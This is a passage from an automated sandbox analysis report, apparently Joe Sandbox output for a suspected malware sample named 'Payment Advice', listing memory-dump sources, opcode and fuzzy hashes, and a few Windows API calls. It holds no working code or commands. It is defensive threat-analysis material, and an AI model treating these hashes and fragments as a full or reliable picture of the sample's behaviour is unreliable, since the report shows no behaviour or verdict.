                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b69b06b005774275d6b735ff69f6fb786acda55351a7e89babe2f0192bcac8fe
                                                                                      • Instruction ID: 42ae7f6c4a721b56c26ef96a0450402901f7304d4833fd026874b0d88fc65d7d
                                                                                      • Opcode Fuzzy Hash: b69b06b005774275d6b735ff69f6fb786acda55351a7e89babe2f0192bcac8fe
                                                                                      • Instruction Fuzzy Hash: 3D21F8B1E006189BEB18CFABD8442DEFBF3AFC8310F14C17AD409A6258EB701A55CA50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 8bq$8bq
                                                                                      • API String ID: 0-1276831224
                                                                                      • Opcode ID: 747546f8d3525546a3dcf35b7b2a787d24709c6290f8b780e4bae79da0c0a24c
                                                                                      • Instruction ID: 5a546059714025f629f41ab49e3ce5571e5274c0ae2ac7398c0d2e8ae7838aad
                                                                                      • Opcode Fuzzy Hash: 747546f8d3525546a3dcf35b7b2a787d24709c6290f8b780e4bae79da0c0a24c
                                                                                      • Instruction Fuzzy Hash: 5B21B1B0B40109AFD700AB68D440A7E7BE2EBC9354F54457AE605EB295EA30CD418B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 3H5$3H5
                                                                                      • API String ID: 0-2752242361
                                                                                      • Opcode ID: 0425968c2e94ca17a5fb1c179a48aeb14d1d70d3f84609190d9ed0823b607f3d
                                                                                      • Instruction ID: 1e3cb9379045a62ec2e68e0960cf539e9d99db4d1aba518c38587e9b95a643c7
                                                                                      • Opcode Fuzzy Hash: 0425968c2e94ca17a5fb1c179a48aeb14d1d70d3f84609190d9ed0823b607f3d
                                                                                      • Instruction Fuzzy Hash: D82116B0E11209EFEB44CFA9C5409AEFBF1FF89340F54C6AAD509A7214E7309A45CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0556DAAF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1716983148.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5560000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID: DrawText
                                                                                      • String ID:
                                                                                      • API String ID: 2175133113-0
                                                                                      • Opcode ID: 2d202ce273c602059e57ce1e506c2841dbd3281d54185d743562bee2f5b271f7
                                                                                      • Instruction ID: 3c5cacc3b90223fc0c6c4c33856084250a6e02d8192e18600899ee4406efbd86
                                                                                      • Opcode Fuzzy Hash: 2d202ce273c602059e57ce1e506c2841dbd3281d54185d743562bee2f5b271f7
                                                                                      • Instruction Fuzzy Hash: 4831C5B59042499FDB10CF99D884AEEFBF5FB48310F14842AE815A7710D775A944CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0556DAAF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1716983148.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5560000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID: DrawText
                                                                                      • String ID:
                                                                                      • API String ID: 2175133113-0
                                                                                      • Opcode ID: e38e1a54d5cbbd1103ddcbb9ccbcc9b0f8e2cd6ba27cb477afe5006140e11ec2
                                                                                      • Instruction ID: 31419bfd01cba783da3038960f3f805e1cb8fbb541e5eb60ecaa2aea6e5eb4df
                                                                                      • Opcode Fuzzy Hash: e38e1a54d5cbbd1103ddcbb9ccbcc9b0f8e2cd6ba27cb477afe5006140e11ec2
                                                                                      • Instruction Fuzzy Hash: 1A21D2B5D042499FDB10CF9AD884ADEFBF5FB48320F18842AE819A7310D775A944CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0149DDC1,00000800,00000000,00000000), ref: 0149DFB2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1707985266.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1490000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: 7cff2094f1404a3d01300b1fba9273313272b5e6919e728fc16a9bd6ac827b00
                                                                                      • Instruction ID: ced51468f3b5953f1f5f03322ff8934ffb73e25c4d9295524798f244eec0020e
                                                                                      • Opcode Fuzzy Hash: 7cff2094f1404a3d01300b1fba9273313272b5e6919e728fc16a9bd6ac827b00
                                                                                      • Instruction Fuzzy Hash: 701100B6D042498FDB10CF9AC445ADEFFF4EB88314F10842AE519A7254C379A545CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0149DD46
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1707985266.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1490000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: 9d4dd487c1a36b0b461a2678e9c1dd628dc86651c0b4e11f9f1ceccdfdd66d2e
                                                                                      • Instruction ID: aedb4ba1696025b9ab58a74a8278046d2950b1ebb967cfc788cfa098e572921c
                                                                                      • Opcode Fuzzy Hash: 9d4dd487c1a36b0b461a2678e9c1dd628dc86651c0b4e11f9f1ceccdfdd66d2e
                                                                                      • Instruction Fuzzy Hash: C41110B5C002498FDB10CF9AC444ADEFFF4AF88320F10852AD559B7220C379A545CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      • Instruction ID: 3aab8d7c190f75c9d0b0e378060e4c3884940551a81b3f092d5d69087e235bee
                                                                                      • Opcode Fuzzy Hash: 6c2be57f632009a028dbd4f0ce2422c85a208c70c425dfbac3cc4bb849f9853f
                                                                                      • Instruction Fuzzy Hash: BB319AB0918348EFDB06CF65C4445EDBFF2AF8E301F1491AAE409AB251DB359941CF60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1705668806.000000000108D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0108D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_108d000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ebe3acd33aaaf3bee7fe6864f2b7ad51c9cac7bb66f744020cbeb9e8391f6a27
                                                                                      • Instruction ID: 5cb9c4a9f4eef1732d59c4b5ed4e7e6b25a9983be378ad88c6823d737aaac095
                                                                                      • Opcode Fuzzy Hash: ebe3acd33aaaf3bee7fe6864f2b7ad51c9cac7bb66f744020cbeb9e8391f6a27
                                                                                      • Instruction Fuzzy Hash: 0F213871508200EFCF05EF94D9C0B1ABFA5FB88314F20C2A9E9890B296C33AC416CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 88f84ae2a72869a7a357e2fc765cd764c9b71dea91839374a940884ba077d7a8
                                                                                      • Instruction ID: 610b88a32fe215ae5932346101ddb4d767f898ed1294d063b3cc936aeb45e981
                                                                                      • Opcode Fuzzy Hash: 88f84ae2a72869a7a357e2fc765cd764c9b71dea91839374a940884ba077d7a8
                                                                                      • Instruction Fuzzy Hash: 6121C0F4E19249EFDB05DFA4D4405ACBFB5EB8A341F1492EAE8189B221C7309A41CF40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1706045888.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10ad000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 47af41f349465940c8ee6380f6f7b63844361b1a9987086bf2ac3393a4f40952
                                                                                      • Instruction ID: a394bdec24fd34dcf07a563ff8b7bab4a96f9e3cdcf7465e05bc7103dcf7e868
                                                                                      • Opcode Fuzzy Hash: 47af41f349465940c8ee6380f6f7b63844361b1a9987086bf2ac3393a4f40952
                                                                                      • Instruction Fuzzy Hash: 8A214570184200DFCB11DF98D980F16BFA1EB84314F60C5ADE8894B656C336C407CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1706045888.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10ad000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fd85db913721c5cea3d6be1db8a3575cb72946dfca64de4efdb4694720149f9b
                                                                                      • Instruction ID: 43f1ccadf3c0131ac30578ce9298cca9afb63ec23c12da3bcbc8e9e936d6ff3b
                                                                                      • Opcode Fuzzy Hash: fd85db913721c5cea3d6be1db8a3575cb72946dfca64de4efdb4694720149f9b
                                                                                      • Instruction Fuzzy Hash: 482134B2604200DFCB01DFA8D9C0B2ABFA5FB84314F60C5ADE8894B656C33AD446CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1bb86b1f07193209cacd6e8b963cb50d2711d678fb618e37f8bfae982903c5f9
                                                                                      • Instruction ID: 85ab6ce01dc1aa2dbbdcae518522234352d7e8f81915f43192841274d0087118
                                                                                      • Opcode Fuzzy Hash: 1bb86b1f07193209cacd6e8b963cb50d2711d678fb618e37f8bfae982903c5f9
                                                                                      • Instruction Fuzzy Hash: 482128B0D09348DFDB06CFA9C5445EDBFF2AF8A210F1481AAE404EB252E7354A81CF60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 917db571f3c7cfa7bb89a94e275acec54b9e978586caae557d8383b3d4bc275d
                                                                                      • Instruction ID: b4ebf63035772a1bba4cf20febc3eaae3008203237a72e1649d39bf983d0a9e8
                                                                                      • Opcode Fuzzy Hash: 917db571f3c7cfa7bb89a94e275acec54b9e978586caae557d8383b3d4bc275d
                                                                                      • Instruction Fuzzy Hash: B031EEB0D01319EFEB20DF99C588B9EBBF4BB48354F248529E404BB254D7B55888CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e0853caa41f2a249c9cb094601318d124355faf1f4c16b02f7be976d52b7be58
                                                                                      • Instruction ID: 49303ec39e90a6a51993f870fb538fdf5c387c43c03596c5d608988a10ef4ce9
                                                                                      • Opcode Fuzzy Hash: e0853caa41f2a249c9cb094601318d124355faf1f4c16b02f7be976d52b7be58
                                                                                      • Instruction Fuzzy Hash: 5D2139F8908249DFDB40CFA9C1809EEBBF1BB8A350F205299D814A7366C730AA40CB55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d929b5708845e772deb9934639152a60f06a5af43b79c4af82e973142d51d6a
                                                                                      • Instruction ID: c6098a5292ba409ce56514f870e08900217491faa14a28731baa96406ebdd571
                                                                                      • Opcode Fuzzy Hash: 6d929b5708845e772deb9934639152a60f06a5af43b79c4af82e973142d51d6a
                                                                                      • Instruction Fuzzy Hash: 022139B0D09348DFDB46CFA9C4446EDBFF2AF8A310F1481AAD445AB252D7399945CF60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1b852af6e321c3c2a7ee2412eba0d05a5ad8985872d4706d1d6eb313300f3815
                                                                                      • Instruction ID: 51796298877d93cf367f95e33a6ae28196bf4d4950f668f997e4a25dd7e9e420
                                                                                      • Opcode Fuzzy Hash: 1b852af6e321c3c2a7ee2412eba0d05a5ad8985872d4706d1d6eb313300f3815
                                                                                      • Instruction Fuzzy Hash: AD11CDB0819219FFEB0ACF64C4445EDBFF9FB8A380F106A55D40AAA212D7309442CBB0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a9eeb7bb7ea76bf20081a260317b319703f5f5c71e3b00a85d19f171f6c45a86
                                                                                      • Instruction ID: 785a741789d6061d6b163c1e389a0d6bdd5d36e0d0ec8602259125b1aa60bd47
                                                                                      • Opcode Fuzzy Hash: a9eeb7bb7ea76bf20081a260317b319703f5f5c71e3b00a85d19f171f6c45a86
                                                                                      • Instruction Fuzzy Hash: 111108B1754341FFFB2B8A158909F397B62DBC2B81F198667E4419F292C534E840C703
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1706045888.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10ad000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 35670de0f1b9dc92ebdc0ffaf56e424f1bcdfd7503bcdaa6f186bc4faf47141e
                                                                                      • Instruction ID: 4e67e185a7a6971735d30270c19a9a0be15769cb5b0c81da043950a518664527
                                                                                      • Opcode Fuzzy Hash: 35670de0f1b9dc92ebdc0ffaf56e424f1bcdfd7503bcdaa6f186bc4faf47141e
                                                                                      • Instruction Fuzzy Hash: 222183755483809FCB03CF64D994B11BFB1EB46214F28C5DAD8898F6A7C33A9816CB62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 043e6a6c9ff2795d4fe245a39c8466900ae8645eb8ca1ab21a3357480aa05562
                                                                                      • Instruction ID: 6823083023bea37379e867c16bd71d9fda224103fbcfca313747d7cb86afc091
                                                                                      • Opcode Fuzzy Hash: 043e6a6c9ff2795d4fe245a39c8466900ae8645eb8ca1ab21a3357480aa05562
                                                                                      • Instruction Fuzzy Hash: 1121B0B4A10908DFD748CF5AE189899BFF1FF88310F5281D4E8889B325DB71E991CB01
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cf46a366f10cb357b5b78a0668f8add61fb39b51ce126333e7e68b5326727d19
                                                                                      • Instruction ID: 9b66b78c698de414af40eab7754efb99702ed55c5426a6872c5a0a20a46d7c02
                                                                                      • Opcode Fuzzy Hash: cf46a366f10cb357b5b78a0668f8add61fb39b51ce126333e7e68b5326727d19
                                                                                      • Instruction Fuzzy Hash: D62134B1904349DFCB10DFAAC844ADEBFF4FB49320F10852AE959A7211D778A940CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e5d0bc296bfebcb2739a84f932eff65863808c9f6ee124832a4355aa9e7a917f
                                                                                      • Instruction ID: 73435015c24be4e1ccea59cce439a2ded0ba196b30a9e925064dfd65d9fff560
                                                                                      • Opcode Fuzzy Hash: e5d0bc296bfebcb2739a84f932eff65863808c9f6ee124832a4355aa9e7a917f
                                                                                      • Instruction Fuzzy Hash: FF114CF0D09208EFDB05DFA8C5409EDBFF5EB8A350F1096A5E4549B266DB309A41DF81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6c6061d75b730ecbbfe2ba5da83731d3d08fcfd66be8005c7ccff300c9f3a3e9
                                                                                      • Instruction ID: d8d7e4921785e4b7cb30a380c8cf4692ddd8af7c955365e91aeff49e72b4e142
                                                                                      • Opcode Fuzzy Hash: 6c6061d75b730ecbbfe2ba5da83731d3d08fcfd66be8005c7ccff300c9f3a3e9
                                                                                      • Instruction Fuzzy Hash: CF21EAF4E18209DFDB44CFA9C1819AEBBF5BB8A340F209155D809A7365D730AA40CF95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1705668806.000000000108D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0108D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_108d000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                                      • Instruction ID: b24cd91fcfb622df21eecaf0a9c5a09d091099f4bdbfd9e07182f37f2c6b1558
                                                                                      • Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                                      • Instruction Fuzzy Hash: BD218C76504284EFDF06DF54D9C4B16BFB2FB88314F24C6A9D9890A256C33AD426CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d466c936a63db30dbea11ab177a6f6e3a0506b28feff8b83c9ff5105c3164501
                                                                                      • Instruction ID: 26b8dda6b05fd8c38800fa378563a0efa45b980eceb168059b5805b46da804d3
                                                                                      • Opcode Fuzzy Hash: d466c936a63db30dbea11ab177a6f6e3a0506b28feff8b83c9ff5105c3164501
                                                                                      • Instruction Fuzzy Hash: 9611A0B1B003569F9B15EF7998884BFBBF6EBC42A07144A29E859D7340EF3099058761
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0dc4678ecebd27a50013d8b0c20c2ef44a0e1e6ac6ee4c1be44ab952ecd45c74
                                                                                      • Instruction ID: bd60441778c97eac9edfb248eefa8b94ba733e314c50cccd656c1907199e9e80
                                                                                      • Opcode Fuzzy Hash: 0dc4678ecebd27a50013d8b0c20c2ef44a0e1e6ac6ee4c1be44ab952ecd45c74
                                                                                      • Instruction Fuzzy Hash: E42103B5900249AFDB20DF9AC884ADEBFF4FB49360F108429E919A7210C374A954CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bdd7ef0ffa903615b2622e2a9b8144096d497ecab931de34270ad93394d4b25a
                                                                                      • Instruction ID: 0861a4451fc7d8745f1da7a05ec4c36436a18412c50f65ae0176d6f1229413cf
                                                                                      • Opcode Fuzzy Hash: bdd7ef0ffa903615b2622e2a9b8144096d497ecab931de34270ad93394d4b25a
                                                                                      • Instruction Fuzzy Hash: F0212CF1E046589BEB19CFAAC8447DEBEF3AFC9300F04C16AD40866264DB7405458F64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d92b7226f44717db3c644e596986de809ced50035477836e6720b7a512e4f101
                                                                                      • Instruction ID: 4ffb2b25a4d6005e6f2bdaa3526dc02686e46f5495d4fd8762a62046675320b5
                                                                                      • Opcode Fuzzy Hash: d92b7226f44717db3c644e596986de809ced50035477836e6720b7a512e4f101
                                                                                      • Instruction Fuzzy Hash: B1211BF4906229DFEF50DB64DA55B9CB7B2FB85244F0082E6D409A7744DB308D92CF61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1706045888.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10ad000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction ID: b424ed3f8685f0196d1014874fc7b70ffb6ddde104814668d241a738b15a6c81
                                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction Fuzzy Hash: E111DD76504280CFDB02CF98D5C4B15BFB1FB84314F24C6AAD8894B656C33AD40ACB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b2a4025956b0eb20cbb0ce9b077ca6a5ee5519ac55f36da4d212b4b8bacc4452
                                                                                      • Instruction ID: 50bce7aeedc061661147770a2700107e2797a45cccc6a908af56bc069c035faa
                                                                                      • Opcode Fuzzy Hash: b2a4025956b0eb20cbb0ce9b077ca6a5ee5519ac55f36da4d212b4b8bacc4452
                                                                                      • Instruction Fuzzy Hash: C61191F5A14209DFEF04CF68E88B559BBF8FB853947142655E406D7642FBB0E800CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4917e2fcc763a185366c3dbd948044dad322569cd27238568634caeaa1c19628
                                                                                      • Instruction ID: 75c3293c3cc876dfc2bf32df162136feaa332db5d4e4d7208777b3e717b56c8c
                                                                                      • Opcode Fuzzy Hash: 4917e2fcc763a185366c3dbd948044dad322569cd27238568634caeaa1c19628
                                                                                      • Instruction Fuzzy Hash: FC11A9F091410DDFEB44DF68E84AAADBBF5FB8A340F018925E401A7350DBB09545CF51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
